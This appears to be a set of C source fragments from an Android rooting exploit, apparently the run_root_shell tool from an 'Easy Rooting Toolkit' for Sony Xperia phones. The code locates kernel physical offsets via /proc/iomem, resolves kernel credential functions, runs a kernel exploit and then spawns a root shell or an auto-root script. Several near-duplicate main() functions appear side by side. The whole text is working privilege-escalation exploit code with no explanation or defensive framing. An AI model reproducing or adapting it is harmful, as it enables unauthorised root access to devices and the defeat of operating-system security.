static bool detect_kernel_phys_parameters(void) { FILE *fp; void *system_ram_address; char name[BUFSIZ]; void *start_address, *end_address; int ret; system_ram_address = NULL; fp = fopen("/proc/iomem", "r"); if (!fp) { printf("Failed to open /proc/iomem due to %s.\n", strerror(errno)); return false; } while ((ret = fscanf(fp, "%p-%p : %[^\n]", &start_address, &end_address, name)) != EOF) { if (!strcmp(name, "System RAM")) { system_ram_address = start_address; continue; } if (!strncmp(name, "Kernel", 6)) { break; } } fclose(fp); set_kernel_phys_offset((int)system_ram_address); return true; }
int main(int argc, char **argv) { set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); exit(EXIT_FAILURE); } if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } system("/system/bin/sh"); exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { char* command = NULL; int i; for (i = 1; i < argc; i++) { if (!strcmp(argv[i], "-c")) { if (++i < argc) { command = argv[i]; } } } set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); exit(EXIT_FAILURE); } if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } if (command == NULL) { system("/system/bin/sh"); } else { execl("/system/bin/sh", "/system/bin/sh", "-c", command, NULL); } exit(EXIT_SUCCESS); }
int main(int argc, char **argv) { printf("run_root_shell v2.2\n"); printf("Based on pref_event exploit\n\n"); printf("Modified for auto-rooting by DooMLoRD\n"); printf("Part of Easy Rooting Toolkit\n\n"); printf("Changelog:\n"); printf("v2.0: added support for Xperia S (LT26) {FW: 6.2.B.0.211} [Cust: 1257-8080]\n"); printf("v2.1: added support for Xperia Z (C6603) {FW: 10.1.1.A.1.307} [Cust: 1270-6704]\n"); printf("v2.2: added support for Xperia SP (C5302) {FW: 12.0.A.1.284} [Cust: 1272-1092]\n"); set_kernel_phys_offset(0x200000); remap_pfn_range = get_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); exit(EXIT_FAILURE); } if (!setup_creds_functions()) { printf("Failed to get prepare_kernel_cred and commit_creds addresses.\n"); exit(EXIT_FAILURE); } run_exploit(); if (getuid() != 0) { printf("Failed to obtain root privilege.\n"); exit(EXIT_FAILURE); } else { printf("Launching auto-root script!\n"); system("/system/bin/sh /data/local/tmp/doomed2"); } exit(EXIT_SUCCESS); }
bool run_with_mmap(memory_callback_t callback) { unsigned long int kernel_physical_offset; bool result; if (run_exploit_mmap(callback, &result)) { return result; } setup_remap_pfn_range_address(); if (!remap_pfn_range) { printf("You need to manage to get remap_pfn_range addresses.\n"); return false; } setup_ptmx_fops_mmap_address(); if (!ptmx_fops_mmap_address) { printf("You need to manage to get ptmx_fops addresses.\n"); return false; } kernel_physical_offset = device_get_symbol_address(DEVICE_SYMBOL(kernel_physical_offset)); if (kernel_physical_offset) { set_kernel_phys_offset(kernel_physical_offset - 0x00008000); } else if (!detect_kernel_phys_parameters()) { printf("You need to manage to get kernel_physical_offset addresses.\n"); return false; } return attempt_exploit(ptmx_fops_mmap_address, (unsigned long int)&ptmx_mmap, 0, run_callback_with_mmap, callback); }